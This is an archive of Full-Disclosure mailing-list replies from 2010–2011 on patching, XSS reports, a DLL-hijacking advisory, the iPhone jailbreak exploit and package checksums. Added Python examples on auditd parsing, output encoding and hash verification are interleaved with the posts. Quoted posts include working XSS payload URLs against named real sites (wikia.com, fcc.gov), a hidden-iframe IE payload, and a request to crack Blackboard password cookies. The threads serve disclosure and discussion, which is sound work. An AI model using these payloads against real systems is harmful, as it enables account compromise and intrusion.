On Feb 6, 2011 6:18 AM, Emanuel dos Reis Rodrigues emanueldosr...@gmail.com wrote:
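A parser in the spirit of the script mentioned above, added as an example and not the poster's own code: it correlates auditd SYSCALL and EXECVE records by their audit serial and emits one line per successful execution in the "user (running as user2) ran ... with args: ..." form. It assumes an execve audit rule is loaded (for instance `-a always,exit -F arch=b64 -S execve -k exec`); the log records and the uid-to-name map are constructed stand-ins for /var/log/audit/audit.log and /etc/passwd.

```python
import re

# Constructed uid -> name map standing in for an /etc/passwd lookup (assumption).
UID_NAMES = {0: "root", 1000: "user", 1001: "user2"}

# Constructed records in auditd's native format (not taken from the post). Each
# execve yields a SYSCALL record plus an EXECVE record that share one serial.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1296970000.123:4711): arch=c000003e syscall=59 success=yes exit=0 ppid=2200 pid=2345 auid=1000 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts0 ses=3 comm="ssh" exe="/usr/bin/ssh" key="exec"
type=EXECVE msg=audit(1296970000.123:4711): argc=2 a0="ssh" a1="user@host"
type=CWD msg=audit(1296970000.123:4711): cwd="/home/user"
type=SYSCALL msg=audit(1296970005.500:4712): arch=c000003e syscall=59 success=yes exit=0 ppid=2200 pid=2350 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="bash" exe="/bin/bash" key="exec"
type=EXECVE msg=audit(1296970005.500:4712): argc=3 a0="bash" a1="-c" a2=6563686F2068656C6C6F
type=SYSCALL msg=audit(1296970009.000:4713): arch=c000003e syscall=2 success=no exit=-13 auid=1000 uid=1000 euid=1000 exe="/bin/cat" key="sshd_config"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
UNSET_UID = 4294967295  # auditd's value for "no login uid" (daemons, boot-time processes)


def parse_fields(line):
    """Split one record into key -> raw value; quoted values keep their quotes so
    a quoted string can be told apart from a hex-encoded one."""
    return dict(FIELD_RE.findall(line))


def unquote(raw, default=None):
    if raw is None:
        return default
    return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw


def execve_args(fields):
    """Rebuild argv from an EXECVE record. auditd hex-encodes (and leaves
    unquoted) any argument containing a space, a quote or a control byte."""
    argv = []
    for i in range(int(fields.get("argc", "0"))):
        raw = fields.get(f"a{i}")
        if raw is None:
            break  # truncated record: keep what is there
        if raw.startswith('"'):
            argv.append(unquote(raw))
        elif HEX_RE.match(raw):
            argv.append(bytes.fromhex(raw).decode("utf-8", "replace"))
        else:
            argv.append(raw)
    return argv


def uid_name(raw):
    try:
        uid = int(raw)
    except (TypeError, ValueError):
        return str(raw)
    if uid == UNSET_UID:
        return "(no login uid)"
    return UID_NAMES.get(uid, f"uid:{uid}")


def parse_audit_log(text):
    """Group records into events keyed by serial: {serial: {"ts", "records": {type: [fields]}}}."""
    events = {}
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue  # blank line or non-record noise
        fields = parse_fields(line)
        ev = events.setdefault(int(m.group(2)), {"ts": float(m.group(1)), "records": {}})
        ev["records"].setdefault(fields.get("type"), []).append(fields)
    return events


def summarize_execs(text):
    """One readable line per successful program execution, oldest serial first."""
    lines = []
    for _serial, ev in sorted(parse_audit_log(text).items()):
        recs = ev["records"]
        if "SYSCALL" not in recs or "EXECVE" not in recs:
            continue  # not an execve (e.g. the denied open of sshd_config above)
        sc = recs["SYSCALL"][0]
        if unquote(sc.get("success")) != "yes":
            continue  # execve failed, so nothing actually ran
        login, effective = uid_name(sc.get("auid")), uid_name(sc.get("euid"))
        who = login if login == effective else f"{login} (running as {effective})"
        argv = " ".join(execve_args(recs["EXECVE"][0]))
        lines.append(f"{who} ran {unquote(sc.get('exe'))} with args: {argv}")
    return lines


if __name__ == "__main__":
    for line in summarize_execs(SAMPLE_LOG):
        print(line)
```

The login user comes from auid (set at login and preserved across su/sudo), which is what makes the "running as" distinction visible even when the shell history belongs to a different account.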
Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)
At the risk of having the eyes of the spiteful turned on me...

It's kind of funny how these sorts of groups seem to be governed by a pursuit of the lulz -- that is, personal amusement/schadenfreude at the expense of someone else, usually as a result of their own actions. But ironically, if Mr. Kaiser can be believed and judging by his overall tone of general irritation, it seems to be not quite so funny for the lulz-seekers when it happens to them.

Although, to be honest, I think it's pretty funny. Kudos to trelane if he really did it; he's probably lulz enemy número uno now or something.

On Jan 27, 2011, at 1:40 PM, Leon Kaiser litera...@gmail.com wrote:

The person who did it was not a member of Goatse Security. It was a moron who thought that this would be funny. (The person in question is the guy who actually posted it on Full-Disclosure in the first place, Andrew Kirch)

Leon

Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr
http://gnaa.eu || http://security.goatse.fr
7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive." -- Andrew "weev" Auernheimer

On Thu, 2011-01-27 at 08:59 -0500, Kevin Lynn wrote:

Knowing one of the people listed in the shout-outs, I told them about the props and they got back with the following statement:

After doing some digging, [I] found out that they did it to their own website to generate publicity. The person responsible told me he didn't think anything would happen from it so he used my old nick. He apologized to me and said he'll not do something like that in the future.
Re: [Full-disclosure] Getting Off the Patch
Just on top of this, I would like to ask a question of Pete in the form of an example.

Pete, let's say one of the assets I want to protect is the code for my site running on the web server. Now, let's say my web server has a serious bug that allows a given attacker to read the raw contents (i.e. code) of *any* file the web server has access to. In this circumstance, the web server still must be able to interact with these assets by reading and subsequently executing them for continued operations, but it is this very same vector that is being exploited by the attacker. Are there any controls, besides patching, that can be applied here without inhibiting current operations in any way? (Switching web servers not being an option for various reasons, even though that's where I would go first).

-Zach

On Jan 14, 2011, at 11:08 AM, Thor (Hammer of God) t...@hammerofgod.com wrote:

[Combining Threads]

-Original Message-
From: Pete Herzog [mailto:li...@isecom.org]
Sent: Friday, January 14, 2011 10:19 AM
To: Thor (Hammer of God)
Cc: valdis.kletni...@vt.edu; phocean; full-disclosure@lists.grok.org.uk; Zach C
Subject: Re: [Full-disclosure] Getting Off the Patch

It's brilliant! Where do I sign up?
t

What you run a patch management company? What's your problem with trying to improve the way we do things? If we find patching isn't a good nor necessary solution for better security then why shouldn't we propose a new model?

No, I do not run a patch management company, but despite that, I successfully patch on an ongoing basis without experiencing any of your claimed wastes of money, time, and resources. And within the context of this conversation, since you are the one saying that you don't have to patch, it should be you that illustrates a level of patch management expertise. Coming up with some way of creating a dependency on new, additional security in depth requirements that on their own create additional administration in order to consciously stop patching is ridiculous Pete. If your controls are good enough to obviate the need for patching, then they should ALREADY BE in place, and part of the model which includes patching. This is why you are seeing the "wtf is new or different about this?" posts.

merge

Maybe you misunderstood this? If you need empirical evidence that patches change code then please do a diff yourself between two apps, one patched and one not. Here I was writing of the cost of functional testing and remediation of the operational security which scales exponentially as the operations scale. One doesn't need a server farm to prove as more servers are introduced into an operation that the number of connections between them grows. 2 servers each with 1 connection has 2. Add 2 more servers and now you have 4 servers but 8 connections to verify. And it goes on like that. If you don't do any testing and don't care then you don't have that work or money to lose with patching. But I said that already.

The fact that patching changes code is a point so obvious that it doesn't need to be made. What I asked for is empirical evidence supporting your claim that your "Get Off The Patch" model actually saves time and money, while ensuring that your security is strong enough so that you can decide purposefully not to patch. Having a server farm to perform an ongoing cost analysis of the two models is absolutely required if you are going to present this idea to even the most basic of management personnel. When you go to management with a paradigm shift that will require clearance from legal, policy, engineering and development teams, you will have to show them a clear and unambiguous reduction in costs and risks that will justify the organization assuming the overall risk of not patching. When you make claims such as "patching is a waste of money" and that it causes costs to "spiral exponentially", you are going to have to show that. I submit in this case that you can't provide that because you don't have it, and haven't done it. If the patching process truly is a budget-sucking, workflow blocking, administrative nightmare as you state, then the evidence of that fact should be trivial to illustrate. And nowhere in the model do you address the costs of the new model.

You said, and I quote (which I probably don't have to say since I am actually using quotes), "We find that that the right balance of operational controls at each interactive point within a vector can provide protection against 100% of the threats including unknown threats." How did your "we" find that? You found it HOW? This statement clearly states that YOU HAVE DONE THIS, but I'm confused as to why you would then respond with "I don't need a server farm to prove this". You are stating that you have found a way to protect against 100% of threats, including unknown threats. That statement alone wins you a spot on The Wackiest
Re: [Full-disclosure] Getting Off the Patch
On Jan 13, 2011, at 10:56 AM, Pete Herzog li...@isecom.org wrote:

Zach,

Please allow me to strip away any opinion for a moment and focus on the facts which seem to be something we will agree on.

1. A patch when applied changes the source code.
2. Patches are released AFTER a flaw is reported.
3. A patch will fix one or more reported flaws in the code.
4. The means to absolutely verify the true source of the patch requires that your security has not already been compromised.
5. Evidence shows that patches, under the guise of security, have been used in the past as a means for a company to change the function of their product, remove content, or enforce licensing terms after it has been purchased and installed on the computer.
6. Patching alone, without operational controls, has not shown to protect systems or services consistently.

Therefore using the facts, we can logically conclude the following:

For every software, there are an unknown quantity of flaws. You protect the software with multiple varied controls to protect against flaws both reported and not.

Seems logical; however...

Therefore when you fix the flaw, you are only fixing a known and reported flaw. This does not protect you against the unknown, unreported flaws still existing and why you still need operational controls. So to say that you need to patch to fix a flaw ignores all the flaws you don't know about.

While true, the patch is still most likely going to eliminate the flaw I *do* know about. I don't have either the connections or the time to find and know about some flaws that aren't covered by the patch, this is true; but I will know about the ones that are, and given my lack of connections, so do many other people, which increases the potential of exploitation (not the likelihood so much, but the potential). If I have the tools and the knowledge to fix a problem, I would figure that I would be remiss in not employing them merely because the other controls in place should keep my data safe. Especially if there is a direct interaction with what I'm patching and what I want to protect (website code apache, can't expect it to work and not be able to read/run my code and such). The tl;dr summary of that, I guess, is "patching will at least keep the skiddies out".

To fix each flaw in addition to adding controls adds new uncertainties both to the software and the operational controls and requires further verification testing to avoid surprise problems. A small change does not mean it's a small test. To ignore the functional testing after patching is to trust that the software maker knows your operations better than you, has your best interest in mind above their own profits, and that is if you can even be sure of where the patch came from.

Potentially, yes. However, it's not exactly like patches I can somewhat trust can come from anywhere else (unless I wrote it), and if I continue to use the software I probably trust its author. It also takes substantial effort to evaluate switching products entirely as opposed to patching what you currently have, but that's just stating the obvious.

Patch only because you can't control the interactions, can't stop the interactions, don't do any quality control or functionality testing anyway, or don't know if you've been already compromised anyway.

Sincerely,
-pete.

All I'm really saying here is that controls external to what is weak are nice and definitely a recommendation, but ultimately can only mitigate what can be done. I'm saying it's generally worth it to patch for that extra assurance against well-known flaws -- but, granted, only especially so after a given period of time that sees many more and/or 'potentially fatal' flaws exposed to the public. Everything does make perfect sense though.

-Zach

On 1/11/2011 2:53 PM, Zach C wrote:

Hmm. So you propose other measures of security as a way of circumventing the requirement of patching vulnerable software. That's nice, but it occurs to me that the vulnerable software is still vulnerable, and sandboxing (as you mentioned in an example) isn't always possible or feasible -- maybe it requires a code change, who knows. I see you mention the time it takes to test patches and their effect on your workflow, but I would figure an equal or greater amount of time would then need to be spent on other solutions as well -- and even when those other solutions are implemented, the software that you're doing all this to is still vulnerable, and likely in a way that such measures can't really prevent all that well (code theft, etc).

Am I mistaken? I thought I got all that right. I haven't read the OSSTMM 3 yet, granted (it's on my to-do list), but I would think that it's still worth doing all that -- just that disregarding patches entirely in favor of this isn't the solution either, which is probably not what you're saying. :)

On Jan 10, 2011
Re: [Full-disclosure] Getting Off the Patch
Hmm. So you propose other measures of security as a way of circumventing the requirement of patching vulnerable software. That's nice, but it occurs to me that the vulnerable software is still vulnerable, and sandboxing (as you mentioned in an example) isn't always possible or feasible -- maybe it requires a code change, who knows. I see you mention the time it takes to test patches and their effect on your workflow, but I would figure an equal or greater amount of time would then need to be spent on other solutions as well -- and even when those other solutions are implemented, the software that you're doing all this to is still vulnerable, and likely in a way that such measures can't really prevent all that well (code theft, etc).

Am I mistaken? I thought I got all that right. I haven't read the OSSTMM 3 yet, granted (it's on my to-do list), but I would think that it's still worth doing all that -- just that disregarding patches entirely in favor of this isn't the solution either, which is probably not what you're saying. :)

On Jan 10, 2011, at 11:41 AM, Pete Herzog li...@isecom.org wrote:

Hi,

Here's a new article on how and why you may want to stop patching your software and take a new approach to your security.

So if patching is a tactic towards a particular security strategy, how can that be bad?

I never said it was all bad. There are reasons where patching makes sense just like there are reasons to get a kick from a cup of coffee, get kicked by a shot of tequila, or spray stuff up your nose to breathe easier for 1.5 seconds. Yes, for the record, I am comparing patching to nasal spray.

Read it here: https://www.infosecisland.com/blogview/10813-Getting-Off-the-Patch.html

Sincerely,
-pete.

--
Pete Herzog - Managing Director - p...@isecom.org
ISECOM - Institute for Security and Open Methodologies
www.isecom.org - www.osstmm.org
www.hackerhighschool.org - www.badpeopleproject.org
Re: [Full-disclosure] FreeBSD backdoor full disclosure
Trolls trolling trolls trolling trolls trolling trolls

On Dec 28, 2010, at 4:32 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

--On December 28, 2010 8:51:40 AM -0500 Григорий Братислава musntl...@gmail.com wrote:

Is question: 'I is created code.c and I is release it. Paul Schmehl is come and take code.c and is backdoor it.'

a) Is I to is blame?
b) Is Schmehl responsible for is backdoor
c) Is my whole developmenter team is responsible

I is beginning to think musntlive is smelling *my* scrotum. How else is explain fixation?

Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer.
**
"When intelligence argues with stupidity and bias, intelligence is bound to lose; intelligence has limits, but stupidity and bias have none."
Re: [Full-disclosure] Everyone loves wikia, so here have an xss against their site(s).
You would find an XSS against one of my favorite wikia wikis :(

-Zach

On Dec 21, 2010, at 5:33 PM, dave b db.pub.m...@gmail.com wrote:

Everyone loves wikia, so here have an xss against their site(s).

http://www.wikia.com/index.php?title=Special:Signuptype=loginaction=submitloginreturnto=Fal%22%3Cscript%3Ealert%28%27fail%27%29;%3C/script%3Elout_Wiki

--
"The lunatic, the lover, and the poet, Are of imagination all compact..." -- Wm. Shakespeare, A Midsummer Night's Dream
Re: [Full-disclosure] Saved XSS vulnerability in Internet Explorer
But it requires that the user/potential victim go to the URL and save it, you say? That doesn't quite seem realistic at all in terms of an attack...

On Nov 14, 2010, at 9:56 AM, MustLive mustl...@websecurity.com.ua wrote:

Hello Full-Disclosure!

I want to warn you about a Cross-Site Scripting vulnerability in Internet Explorer. This is Post Persistent XSS (Saved XSS) (http://websecurity.com.ua/2641/).

Affected products:

Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and previous versions.

Details:

This hole is similar to the Cross-Site Scripting vulnerability in Internet Explorer (http://websecurity.com.ua/1241/) - CVE-2007-4478 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4478), which I found in August 2007 and informed Microsoft about; they ignored it and didn't fix it in IE6, and they didn't fix it in IE7 (or in IE6) after I informed them again in 2008. But they silently and lamerly fixed it in IE8, as I found in May 2010 when I checked this hole in IE8.

This vulnerability differs from the previous one in that the attack goes not via saving the web page, but via saving a web archive (mht/mhtml file) - similarly to the Cross-Site Scripting in Opera (http://websecurity.com.ua/2555/), which I wrote about in 2008.

All versions of IE6, IE7 and IE8 are affected by this hole.

XSS (WASC-08):

http://site/?--<script>alert(XSS)</script>

For the attack it's needed to visit such a URL and save the html page as an mht/mhtml file (Web archive). For the code to execute, the file must be saved not with the mht or mhtml extension, but with the htm or html extension. After that, when the saved page is opened in any browser, the code will run. The attacking code is saved inside the file. This vulnerability is a Saved XSS and Local XSS (http://websecurity.com.ua/4219/).

To make the attack hidden, an iframe can be used in the code of the page:

<iframe src='http://site/?--<script>alert(XSS)</script>' height='0' width='0'></iframe>

Timeline:
2010.11.12 - found vulnerability.
2010.11.12 - disclosed at my site.
2010.11.13 - informed Microsoft.

I mentioned this vulnerability at my site (http://websecurity.com.ua/4677/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
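The Wikia report two threads up and MustLive's saved-page case above are the same mistake in two output contexts: an attacker-controlled URL parameter is written into markup without encoding for the place it lands. The block below is an added example, not code from either poster, from Wikia or from Microsoft. It embeds the two posted URLs as constants (nothing is fetched), decodes the Wikia payload the way the server sees it, and shows the encoding that would have neutralised each. Two things are assumptions, because neither post says so: that the Wikia value was reflected into a quoted attribute (the payload's leading %22 suggests it), and that IE stores the page URL in a "saved from url" header comment, as the CVE-2007-4478 class did. All function names are mine.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs: the two URLs posted in the threads above, embedded as strings
# so nothing here touches a live site.
WIKIA_URL = (
    "http://www.wikia.com/index.php?title=Special:Signup&type=login"
    "&action=submitlogin&returnto=Fal%22%3Cscript%3Ealert%28%27fail%27%29;"
    "%3C/script%3Elout_Wiki"
)
IE_SAVED_URL = "http://site/?--<script>alert(XSS)</script>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def query_params(url: str) -> dict:
    """Split the query string on '&' and percent-decode each pair.

    Done by hand rather than with parse_qs because parse_qs in Python before 3.9.2
    also splits on ';', which would cut the posted payload in half and hide what
    the server actually receives.
    """
    _, _, query = url.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def render_returnto_unsafe(returnto: str) -> str:
    """Reflect the decoded parameter verbatim into a quoted attribute (assumed context)."""
    return f'<input type="hidden" name="returnto" value="{returnto}">'


def render_returnto(returnto: str) -> str:
    """html.escape with quote=True encodes & < > " and ', so the value cannot leave the
    attribute, while the browser still presents the original characters to the user."""
    return f'<input type="hidden" name="returnto" value="{html.escape(returnto, quote=True)}">'


def safe_saved_url(url: str) -> str:
    """Neutralise a URL before it is stored inside an HTML comment (assumed context).

    A comment ends at the first '-->' and '--' inside a comment is invalid markup,
    so a run of dashes is what lets a stored URL terminate the comment early.
    Percent-encoding those characters, instead of deleting them, keeps the URL
    recoverable with unquote(); '<' and '>' are encoded as defence in depth.
    """
    safe = re.sub(r"-{2,}", lambda m: "%2D" * len(m.group()), url)
    return safe.replace("<", "%3C").replace(">", "%3E")


def saved_from_comment(url: str) -> str:
    """Build the header comment with the sanitised URL; the count is the URL length."""
    safe = safe_saved_url(url)
    return f"<!-- saved from url=({len(safe):04d}){safe} -->"


def injects_script(markup: str) -> bool:
    """Crude but sufficient for these inputs: is a raw <script ...> tag present?"""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    returnto = query_params(WIKIA_URL)["returnto"]
    print("decoded returnto:", returnto)
    print("unsafe:", render_returnto_unsafe(returnto), injects_script(render_returnto_unsafe(returnto)))
    print("safe:  ", render_returnto(returnto), injects_script(render_returnto(returnto)))
    print("comment:", saved_from_comment(IE_SAVED_URL))
```

The point of the comment sanitiser is that escaping for an attribute or text node does nothing inside a comment: the only characters that matter there are the dash runs and the closing bracket, so the check has to be written for that context rather than reusing html.escape.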
Re: [Full-disclosure] All the md5 hashes in every single update message sent to this list
They do this so that people who are manually installing or updating software can also verify that the package they are installing is, in fact, the exact same one that the software packager released -- this reduces (but does not eliminate) the chance that someone malicious may have been able to slip something into the update package unnoticed by the installer or the packager.

On Fri, Oct 15, 2010 at 11:22 PM, B1towel b...@b1towel.com wrote:

What is the purpose of all the patch notification emails that, when a security vulnerability is fixed, the people who send out the notification email include a 5-mile-long list of md5 hashes for every single package and all dependencies for the package that was updated? I feel that information does not need to be in the notification that the latest version fixed a security vulnerability, and to me it just gets in the way of reading the occasionally useful content this list has to offer.
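What that verification looks like when done by hand, as an added example (not code from the list, from any distribution's notices or from their tooling): a small parser for the checksum block in both layouts such notices use, the BSD "MD5 (name) = digest" form and the GNU "digest  name" form, and a verifier that hashes the downloaded files in chunks and reports ok, mismatch or missing per file. The checksum block and the package contents are constructed for the example; the digests are the real MD5 values of those contents. The algorithm for GNU-style lines is inferred from digest length, so the same code checks SHA-256 lists unchanged.

```python
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

# Constructed checksum block in the two layouts such notices use: BSD style
# ("MD5 (name) = digest") and GNU md5sum style ("digest  name").
# The digests are the real MD5 values of the sample contents below.
CHECKSUM_BLOCK = """\
MD5 (foo-1.2.3.tar.gz) = 9e107d9d372bb6826bd81d3542a419d6
d41d8cd98f00b204e9800998ecf8427e  foo-1.2.3.tar.gz.sig
"""

# Constructed package contents matching the digests above.
SAMPLE_FILES = {
    "foo-1.2.3.tar.gz": b"The quick brown fox jumps over the lazy dog",
    "foo-1.2.3.tar.gz.sig": b"",
}

BSD_LINE = re.compile(r"^(?P<algo>[A-Za-z0-9-]+) \((?P<name>.+)\) = (?P<digest>[0-9a-fA-F]+)$")
GNU_LINE = re.compile(r"^(?P<digest>[0-9a-fA-F]+) [ *](?P<name>.+)$")
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def parse_checksums(text: str) -> dict:
    """Return {file name: (hashlib algorithm name, lowercase hex digest)}.

    Lines matching neither layout are skipped, so the prose surrounding the
    block in a notice does not break parsing.
    """
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        m = BSD_LINE.match(line)
        if m:
            algo = m.group("algo").lower().replace("-", "")
        else:
            m = GNU_LINE.match(line)
            if not m:
                continue
            algo = DIGEST_LENGTHS.get(len(m.group("digest")))
            if algo is None:
                continue
        entries[m.group("name")] = (algo, m.group("digest").lower())
    return entries


def file_digest(path: Path, algo: str) -> str:
    """Hash the file in 1 MiB chunks so large packages are not read into memory."""
    h = hashlib.new(algo)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_directory(directory: Path, checksum_text: str) -> dict:
    """Check every listed file under directory: {name: 'ok' | 'mismatch' | 'missing'}.

    A match proves the file is the one the notice describes. Whether the notice
    itself is genuine is a separate question that only a signed notice answers.
    """
    results = {}
    for name, (algo, expected) in parse_checksums(checksum_text).items():
        path = directory / name
        if not path.is_file():
            results[name] = "missing"
            continue
        actual = file_digest(path, algo)
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "mismatch"
    return results


def demo() -> tuple:
    """Write the sample files, verify, tamper with the tarball, verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        directory = Path(tmp)
        for name, data in SAMPLE_FILES.items():
            (directory / name).write_bytes(data)
        before = verify_directory(directory, CHECKSUM_BLOCK)
        # Append a single byte: any change to the package changes its digest.
        with (directory / "foo-1.2.3.tar.gz").open("ab") as f:
            f.write(b"\n")
        after = verify_directory(directory, CHECKSUM_BLOCK)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("as released:", before)
    print("after tampering:", after)
```

Running the module prints the two result maps; the second shows the tarball flagged as a mismatch after one appended byte while the untouched signature file still verifies.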
Re: [Full-disclosure] gDoc Fusion version 2.5.1 = Insecure DLL Hijacking Vulnerability (wintab32.dll, ssleay32.dll)
tl;dr everything is vulnerable to dll hijacking zomg we are all going to be pwned.

Ye gods these are irritating. I suppose I should filter them but damn.

On Sep 12, 2010, at 3:53 PM, YGN Ethical Hacker Group li...@yehg.net wrote:

1. OVERVIEW

The gDoc Fusion application is vulnerable to an Insecure DLL Hijacking vulnerability. Other terms that have been coined for this vulnerability class are Remote Binary Planting and Insecure DLL Loading/Injection/Hijacking/Preloading.

2. PRODUCT DESCRIPTION

gDoc Fusion makes it simple and quick to compile a single document from multiple different PC files. Just drag the documents--presentations, spreadsheets, written documents, images, PDF, and more than 200 other file types--into Fusion; flip through them quickly with FlickView browser; pick the pages you want and arrange them in any order you like; if you wish, add comments, make small text edits, or redact information; and Save the finished documents in either Word or PDF format. You don't have to do any formatting or conversion--gDoc Fusion handles it all for you. Also includes a free utility for multi-format document viewing and PDF creation.

3. VULNERABILITY DESCRIPTION

The gDoc Fusion application passes an insufficiently qualified path when loading its external libraries - wintab32.dll, ssleay32.dll - when a user opens an associated file with one of the extensions dwfx, jtx, pdf, xps.

4. VERSIONS AFFECTED

2.5.1 and probably lower versions

5. PROOF-OF-CONCEPT/EXPLOIT

http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/gdocfusion/poc/movie/gdocfusion_2.5.1-dll-hijacking.mp4
http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/gdocfusion/poc/gdocfusion_2.5.1-dll-hijacking-poc.zip

Tested Platform: Windows XP Service Pack 3 (Fresh Windows)

6. IMPACT

Attackers can trigger a successful exploit against a victim user in a number of ways, such as placing a malicious external library file with the hidden attribute set next to a seemingly interesting file on network shares, USB drives, file sharing networks, social networks, etc.

7. SOLUTION

A fixed version from the vendor has not been released yet. However, it is suggested that users deploy the following workarounds to protect against increasing mass exploitation of this vulnerability class:

- Disable loading of libraries from WebDAV and remote network shares
- Disable the WebClient service

Please see the workaround solution links in the References section.

8. VENDOR

Global Graphics Software Ltd.
http://www.globalgraphics.com/en/gdoc/gdoc-fusion

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

09-13-2010: notified vendor
09-13-2010: vulnerability disclosed

11. REFERENCES

Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/[gdocfusion]_2.5.1_insecure_dll_hijacking
Workaround Solution: http://support.microsoft.com/kb/2264107
Workaround Solution: https://www.microsoft.com/technet/security/advisory/2269637.mspx#EGF
Developer Solution: http://msdn.microsoft.com/en-us/library/ff919712%28v=VS.85%29.aspx
Unofficial DLL Hijacking List: http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/
Testing for DLL Hijacking: http://core.yehg.net/lab/pr0js/view.php/when_testing_for_dll_hijacking.txt

#yehg [09-13-2010]
Re: [Full-disclosure] On the iPhone PDF and kernel exploit
According to some of comex's tweets, the exploits he used are public; I also saw one person on Slashdot explain that root was granted via an IOSurface allocation error, while other sources claim part of the Spirit jailbreak was reused in Star. And then, of course, there is the PDF exploit (that crashed Okular too when I tried to read one for shits and giggles -- yeah, not the brightest bulb, I know...).

But you are absolutely right in stating that it really is just as dangerous as it would be if the iPhone were a personal computer or somesuch instead (by intention :)). Remote root is remote root, and it is especially scary how it totally trashes every security measure put in place. Normally with this sort of thing I would suppose disclosure ethics would apply, and perhaps they still do, but at the same time, as you said, revealing the exploits makes it that much easier for Apple to find and patch them in the next release, which is both bane and boon. The next revision would be more secure at the expense of the user's freedom. Hell, the next revision will probably have at least part of this patched anyway just out of Apple's commitment to the walled garden.

However... This particular exploit is only in binary form, and there is no official explanation yet. One usually comes after Apple has patched the flaw (as in responsible (I think it's called?) disclosure). Until then, it's likely that only those skilled in analyzing this sort of thing have any idea at all what Star does -- most of the script kiddies are just using it to jailbreak.

Sent from my iPhone

On Aug 4, 2010, at 5:01 AM, Marcello Barnaba (void) v...@openssl.it wrote:

For the first time in my life, a 0-day exploiting remote code execution, sandbox escaping and privilege escalation has been packaged for general user consumption via a web site ( http://jailbreakme.com ). The actual pdf exploit can be downloaded here: http://jailbreakme.com/_/.

What puzzles me is.. no notices here on FD, no info on Bugtraq, no CVE, no press release by the CERT, as of now.

The cat & mouse game played by the iPhone dev team and Apple is done to liberate our devices from useless restrictions, but the whole point for them to exist is because said devices live in a walled garden, that is really useful only to the company behind it.

I've posted more thoughts and the few technical details I was able to gather (from a tweet!) here: http://sindro.me/2010/8/4/on-the-iphone-pdf-and-kernel-exploit

What do you think? Did someone reverse engineer the exploit?

~Marcello
--
~ marcello.barn...@gmail.com
~ http://www.linkedin.com/in/marcellobarnaba
~ http://sindro.me/
Re: [Full-disclosure] Day of bugs in WordPress 2
So if Drupal and WordPress, etc. are so terrible, what would you all recommend?

-Zach

On Jul 29, 2010, at 4:16 PM, coderman coder...@gmail.com wrote:

On Thu, Jul 29, 2010 at 3:05 PM, Christian Sciberras uuf6...@gmail.com wrote:
... Please! Don't put Drupal and decent in the same sentence!

when the bar is wordpress, .. well, you get the picture. (those modules though, most could use regular scrubbing)
Re: [Full-disclosure] blackboard
Wait, did you even try and replay them yet?

On Fri, May 28, 2010 at 7:22 PM, Justin Chang ktriv...@msn.com wrote:

What are the encoded_pw and encoded_pw_unicode cookies in blackboard? These are passed in clear text with the username and I am trying to see if I can get the password from this:

encoded_pw=89105107B8048EB7C8D744EE84C12A1E
encoded_pw_unicode=13D0F95489DAA8A9DC1D2B9E975F97B0

Help appreciated. Thanks
Re: [Full-disclosure] fcc.gov XSS
There seem to be a few more problems with that script than just that XSS... For example, going to the Application Search page root (the page that takes you to that one, presumably) and selecting literally everything in the Services listbox will net you an error reporting "Incorrect syntax near ',' for server 'HEIMDAL'". It apparently occurs on line 4. I dunno. I'm not gonna mess around with it too much though :)

On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote:

FCC.gov XSS

--- CODE ---
http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E
http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E
--- CODE ---

--oxagast
Re: [Full-disclosure] iPhone data protection flaw
The iPhone uses proprietary protocols over USB for file operations, syncing and the like -- the only real authentication that I can recall (and I got it working to begin with ;)) was that the session with lockdownd (kind of a broker for starting services, etc.) eventually goes SSL... there is also device pairing but it is really trivial to do and doesn't restrict the computer at all. It just so happens that Lucid Lynx might include libimobiledevice, ifuse/gvfs-afc and all the necessary components now. :)

